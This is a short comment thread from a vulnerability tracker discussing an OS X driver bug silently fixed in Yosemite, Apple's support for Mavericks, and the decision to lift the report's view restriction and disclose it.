I think this might have been fixed in Yosemite. Apple haven't replied to my bug report yet but I'l gonna ping them to see if this was silently fixed. If so I'll mark this bug as invalid and open it up (along with the exploit.)

@ianbeer: I wonder what the right thing to do here is? Is Mavericks still supported? If so, I would expect this report to be subject to a 90-day deadline for Apple to fix this issue in their still-supported OS version.

Apple would then have 90 days to either:

- Patch Mavericks.
- Desupport Mavericks in support of Yosemite.

Apple confirmed that they did indeed fix this in 10.10.

Regarding supported versions of OS X, I don't think there is such a concept.

Mavericks did receive a security update when Yosemite was released but it only had patches for POODLE. It did not contain patches for any of the other externally reported bugs fixed in Yosemite, and clearly also didn't contain patches for the silently fixed bugs (such as this) either. I would argue that's equivalent to no longer supporting Mavericks. It's trivial to bindiff the patched drivers and find these bugs, therefore I'm marking this bug report as invalid and removing the view restriction.